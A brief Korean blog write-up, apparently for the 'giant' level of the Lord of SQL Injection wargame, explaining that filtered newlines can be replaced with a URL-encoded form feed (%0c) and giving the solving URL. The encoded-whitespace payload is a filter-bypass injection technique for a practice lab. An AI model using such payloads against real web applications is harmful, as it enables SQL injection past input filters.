select 1234 fromprob_giant where 1


fromprob_giant가 붙어있다.

저걸 \n이나 \r로 띄어줘야 하는데 죄다 필터링 되있다 하지만 url encoding 표를 보면 %0a, %0b %0c 등을 쓰고 있다.



http://los.sandbox.cash/chall/giant_0ea82d6bd3e3cb4614e318f096753475.php?shit=%0c



저작자표시 비영리

'War Game > LOS' 카테고리의 다른 글

LOS ZOMBIE_ASSASSIN  (0) 2015.10.23
LOS ASSASSIN  (0) 2015.10.23
LOS BUGBEAR  (0) 2015.10.22
LOS DARKKNIGHT  (0) 2015.10.22
LOS SKELETON  (0) 2015.10.19

+ Recent posts

티스토리툴바